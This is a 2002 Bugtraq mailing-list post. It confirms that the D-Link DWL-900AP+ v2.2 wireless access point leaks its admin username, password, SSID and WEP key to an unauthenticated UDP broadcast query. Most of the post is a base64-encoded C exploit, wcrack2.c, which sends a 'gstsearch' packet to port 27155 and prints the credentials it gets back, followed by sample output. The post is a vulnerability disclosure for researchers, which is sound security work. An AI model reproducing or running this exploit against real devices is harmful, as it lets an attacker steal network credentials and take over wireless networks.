[27754] in bugtraq
Re: Accesspoints disclose wep keys, password and mac filter (fwd)
daemon@ATHENA.MIT.EDU (Hakan Carlsson)
Fri Nov 8 01:22:37 2002
Date: Tue, 5 Nov 2002 10:44:22 +0100 (CET)
From: Hakan Carlsson <hockey@easylogic.se>
To: bugtraq@securityfocus.com
In-Reply-To: <Pine.BSO.4.44.0211031440290.26887-100000@ghibli.knienieder.com>
Message-ID: <20021105103543.R9435-200000@localhost>
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="0-824473079-1036489462=:9435"
--0-824473079-1036489462=:9435
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: 8BIT
On Sun, 3 Nov 2002, Tom Knienieder wrote:
Tom Knienieder> Possibly vulnerable, not tested, OEM Version from GlobalSunTech:
Tom Knienieder> D-Link DWL-900AP+ B1 version 2.1 and 2.2
DWL-900AP+ ver 2.2 is vunerable. After changing the test prog (attached)
it returned:
Type : GL2422AP-00-0M0 T1.0 -042.2
Announced Name : DWL-900AP+
Admin Username : admin
Admin Password : secret
SSID : mySSID
Wep KEY : 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d
Don't seem to work on Dlink DI-713P (wlan side)
/håkan
--0-824473079-1036489462=:9435
Content-Type: TEXT/PLAIN; charset=ISO-8859-1; name="wcrack2.c"
Content-Transfer-Encoding: BASE64
Content-ID: <20021105104422.S9435@localhost>
Content-Description:
Content-Disposition: attachment; filename="wcrack2.c"
LyoNCg0KIE9yaWcgdmVyc2lvbiBieSBUb20gS25pZW5pZWRlciA8a25pZW5p
ZWRlckBraGFtc2luLmNoPg0KIFBhdGNoZWQgYnkgSOVrYW4gQ2FybHNzb24g
PGhvY2tleUBlYXN5bG9naWMuc2U+IGZvciBEV0wtOTAwQVArIHYyLjINCg0K
Ki8NCg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+
DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pbi5o
Pg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCg0KdHlwZWRlZiBzdHJ1Y3Qg
ew0KICAgICAgICBjaGFyIHR5cGVbMzJdIC8qIFsyOF0gKi87DQoJY2hhciBz
Y3IxIFs0XTsNCiAgICAgICAgY2hhciBuYW1lWzMyXTsNCiAgICAgICAgY2hh
ciB1c2VyWzE2XTsNCiAgICAgICAgY2hhciBwYXNzWzE2XTsNCgljaGFyIHNj
cjIgWzQwOF07DQoJY2hhciBzc2lkIFszMl07DQoJY2hhciBzY3IzIFs2MV07
DQoJdW5zaWduZWQgY2hhciB3a2V5IFsxM107DQp9DQpfX2F0dHJpYnV0ZV9f
ICgocGFja2VkKSkgYW5zd2VyOw0KDQppbnQgbWFpbigpDQp7DQogICAgICAg
IGNoYXIgcmN2YnVmZmVyWzEwMjRdOw0KICAgICAgICBzdHJ1Y3Qgc29ja2Fk
ZHJfaW4gc2luOw0KICAgICAgICBhbnN3ZXIqIGFucyA9IChhbnN3ZXIgKily
Y3ZidWZmZXI7DQogICAgICAgIGludCBzZCwgcmV0LCB2YWw7DQoNCiAgICAg
ICAgc2luLnNpbl9mYW1pbHkgICAgICAgICAgPSBBRl9JTkVUOw0KICAgICAg
ICBzaW4uc2luX2FkZHIuc19hZGRyICAgICA9IGluZXRfYWRkcigiMjU1LjI1
NS4yNTUuMjU1Iik7DQogICAgICAgIHNpbi5zaW5fcG9ydCAgICAgICAgICAg
ID0gaHRvbnMoMjcxNTUpOw0KDQogICAgICAgIHNkID0gc29ja2V0KEFGX0lO
RVQsIFNPQ0tfREdSQU0sIDApOw0KICAgICAgICBpZiAoc2QgPCAwKQ0KICAg
ICAgICAgICAgICAgIHBlcnJvcigic29ja2V0Iik7DQoNCiAgICAgICAgdmFs
ID0gMTsNCiAgICAgICAgcmV0ID0gc2V0c29ja29wdChzZCwgU09MX1NPQ0tF
VCwgU09fQlJPQURDQVNULCAmdmFsLCBzaXplb2YodmFsKSk7DQogICAgICAg
IGlmIChyZXQgPCAwKQ0KICAgICAgICB7DQogICAgICAgICAgICAgICAgcGVy
cm9yKCJzZXRzb2Nrb3B0Iik7DQogICAgICAgICAgICAgICAgZXhpdCgxKTsN
CiAgICAgICAgfQ0KDQogICAgICAgIHJldCA9IHNlbmR0byhzZCwgImdzdHNl
YXJjaCIsIDksIDAsIChjb25zdCBzdHJ1Y3Qgc29ja2FkZHIgKikmc2luLA0K
CQkJc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpOw0KICAgICAgICBpZiAocmV0
IDwgMCkNCiAgICAgICAgew0KICAgICAgICAgICAgICAgIHBlcnJvcigic2Vu
ZHRvIik7DQogICAgICAgICAgICAgICAgZXhpdCgxKTsNCiAgICAgICAgfQ0K
DQogICAgICAgIHJldCA9IHJlYWQoc2QsJnJjdmJ1ZmZlcixzaXplb2YocmN2
YnVmZmVyKSk7DQoNCiAgICAgICAgcHJpbnRmKCJUeXBlICAgICAgICAgICAg
OiAlLjMyc1xuIixhbnMtPnR5cGUpOw0KICAgICAgICBwcmludGYoIkFubm91
bmNlZCBOYW1lICA6ICVzXG4iLGFucy0+bmFtZSk7DQogICAgICAgIHByaW50
ZigiQWRtaW4gVXNlcm5hbWUgIDogJXNcbiIsYW5zLT51c2VyKTsNCiAgICAg
ICAgcHJpbnRmKCJBZG1pbiBQYXNzd29yZCAgOiAlc1xuIixhbnMtPnBhc3Mp
Ow0KICAgICAgICBwcmludGYoIlNTSUQgICAgICAgICAgICA6ICVzXG4iLGFu
cy0+c3NpZCk7DQogICAgICAgIHByaW50ZigiV2VwIEtFWSAgICAgICAgIDog
Iik7DQoJew0KCQlpbnQgaSA9IDA7DQoJCWZvciAoaT0wOyBpPHNpemVvZihh
bnMtPndrZXkpOyBpKyspIHsNCgkJCXByaW50ZiAoIiUwMnggIiwgYW5zLT53
a2V5W2ldKTsNCgkJfQ0KCQlwcmludGYgKCJcbiIpOw0KCX0NCg0KICAgICAg
ICByZXR1cm4gMDsNCn0NCg==
--0-824473079-1036489462=:9435--
